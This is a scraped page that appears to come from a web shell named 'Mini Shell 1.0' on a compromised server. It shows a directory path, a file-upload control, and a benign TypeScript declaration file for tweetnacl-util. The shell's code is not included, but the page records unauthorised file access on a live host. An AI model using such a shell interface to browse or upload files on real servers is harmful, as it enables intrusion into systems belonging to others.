HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/thread-self/cwd/node_modules/pusher-js/src/d.ts/tweetnacl-util/
Upload File :
Current File : //proc/thread-self/cwd/node_modules/pusher-js/src/d.ts/tweetnacl-util/index.d.ts
declare module 'tweetnacl-util' {
  export function encodeUTF8(data: Uint8Array): string;
  export function decodeUTF8(data: string): Uint8Array;
  export function encodeBase64(data: Uint8Array): string;
  export function decodeBase64(data: string): Uint8Array;
}